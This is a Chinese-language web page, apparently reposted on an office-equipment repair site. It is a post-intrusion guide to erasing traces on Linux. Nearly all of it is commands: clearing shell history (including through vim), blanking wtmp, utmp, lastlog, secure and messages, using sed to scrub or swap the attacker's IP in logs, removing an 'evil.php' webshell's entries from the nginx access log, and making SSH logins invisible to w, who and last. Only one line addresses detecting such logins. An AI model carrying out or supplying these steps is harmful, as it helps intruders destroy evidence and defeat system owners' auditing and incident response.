linux清除操作记录 |
您所在的位置:网站首页 › 终端怎么清除历史记录 › linux清除操作记录 |
渗透过后需要清除部分操作记录,本文总结一些linux清除日志或隐藏的相关的操作 1.清除历史命令删除部分不想被保存的历史命令 vim /root/.bash_history清除当前用户的全部history命令记录(一般不推荐,痕迹很明显了) history -c2.在vim中执行清除命令,在vim中可以执行系统命令而不被history记录,通过vim执行清除历史记录命令 首先查看vim的操作历史 :history将vim操作记录清零 :set history=0再次查看历史命令就查不到了执行系统命令,在:!之后加上命令,比如ls,cd等,不会被记录到 :!pwd在vim中使用分屏功能,清理文件即可 :vsp /root/.bash_history3.列出部分系统日志文件 /var/log/btmp 记录所有登录失败信息,使用lastb命令查看 /var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看 /var/log/wtmp 记录所有用户的登录、注销信息,使用last命令查看 /var/log/utmp 记录当前已经登录的用户信息,使用w,who,users等命令查看 /var/log/secure 记录与安全相关的日志信息 /var/log/message 记录系统启动后的信息和错误日志清理登录系统失败的记录 echo > /var/log/wtmp再次查看上次登录信息 lastb部分清除命令 清理相关日志信息 清除用户最后一次登录时间:echo > /var/log/lastlog #lastlog命令 清除当前登录用户的信息:echo > /var/log/utmp #使用w,who,users等命令 清除安全日志记录:cat /dev/null > /var/log/secure 清除系统日志记录:cat /dev/null > /var/log/message4.删除/替换部分日志 删除所有匹配到字符串的行,比如以当天日期或者自己的登录IP sed -i '/自己的ip/'d /var/log/messages全局替换登录IP地址 sed -i 's/192.168.166.85/192.168.1.1/g' secure清除web入侵痕迹 直接替换日志ip地址 sed -i 's/192.168.166.85/192.168.1.1/g' access.log
#清除部分相关日志grep -v 排除某些字段,然后再覆盖原来的日志文件 cat /var/log/nginx/access.log | grep -v evil.php > tmp.log#再把修改过的日志覆盖到原日志文件 cat tmp.log > /var/log/nginx/access.log/5.隐藏远程SSH登录记录 隐身登录系统,不会被w、who、last等指令检测到。 ssh -T [email protected] /bin/bash -i-T表示不分配伪终端如何发现隐藏的的登录 ps -ef|grep ssh 或者 lsof -i:22不记录ssh公钥在本地.ssh目录中 ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i
|
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |